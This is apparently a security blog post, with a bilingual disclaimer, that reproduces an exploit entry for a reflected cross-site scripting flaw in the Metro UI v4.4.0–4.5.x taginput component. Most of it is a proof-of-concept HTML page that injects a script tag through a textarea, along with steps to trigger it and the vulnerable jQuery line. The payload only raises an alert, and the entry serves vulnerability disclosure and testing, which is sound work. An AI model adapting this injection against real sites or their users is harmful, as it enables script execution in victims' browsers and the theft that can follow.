Disclaimer
The information provided in this blog post is intended for educational and informational purposes only. It is not intended to encourage or promote any illegal or unethical activities, including hacking, cyberattacks, or any form of unauthorized access to computer systems, networks, or data.
Yasal Uyarı
Bu blog yazısında sağlanan bilgiler yalnızca eğitim ve bilgilendirme amaçlıdır. Bilgisayar korsanlığı, siber saldırılar veya bilgisayar sistemlerine, ağlara veya verilere herhangi bir şekilde yetkisiz erişim de dahil olmak üzere herhangi bir yasa dışı veya etik olmayan faaliyeti teşvik etme veya reklamlama amacı taşımaz.
Yasal bilgiler için
yasal sayfasını inceleyebilirsiniz .
# Exploit Title: Metro UI v4.4.0 Components Library Reflected XSS Injection
# Date: 09-19-2022
# Exploit Author: Ali Can Gonullu / Defans Security, Turkey
# Vendor Homepage: https://metroui.org.ua/intro.html
# Software Link: https://metroui.org.ua/intro.html
# Version: v4.4.0-v4.5.x (REQUIRED)
# Tested on: Windows 10 x64
# Video : https://youtu.be/_wzGVpX54Rc
PoC :
<head>
<title>Exploit PoC</title>
<link rel="stylesheet" href="https://cdn.korzh.com/metroui/v4.5.1/css/metro-all.min.css">
<script src="https://cdn.korzh.com/metroui/v4.5.1/js/metro.min.js"></script>
</head>
<body>
<textarea data-role="taginput" name="kuralicerik" cols="60" rows="10"><script>alert(0)</script>,</textarea>
</body>
Write exploit code to textarea and touch to comma button
That textarea triggering to a javascript code
Vulnerable code : container = $("<div>").addClass("tag-input " + element[0].className).addClass(o.clsComponent).insertBefore(element);
element.appendTo(container);